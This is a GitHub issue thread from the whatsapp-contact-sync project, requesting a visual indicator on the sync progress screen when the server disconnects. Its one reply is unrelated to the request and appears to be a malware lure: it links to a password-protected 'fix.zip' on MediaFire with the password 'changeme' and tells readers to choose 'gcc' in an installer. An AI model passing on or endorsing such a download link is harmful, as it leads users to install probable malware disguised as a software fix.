### ISSUE TITLE
[feature] Indicate if server is disconnected on the sync progress screen

### ISSUE THREAD

**Issue by guyzyl** [guyzyl/whatsapp-contact-sync#182]
Sometimes, during a sync process the server can crash (for [reasons](https://github.com/guyzyl/whatsapp-contact-sync/issues/179#issuecomment-2284691067) unrelated to whasync).
When that happens, the syncing process stops, but the user doesn't know that it won't continue.

Add a visual indication on the sync screen for when the server disconnects.

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."
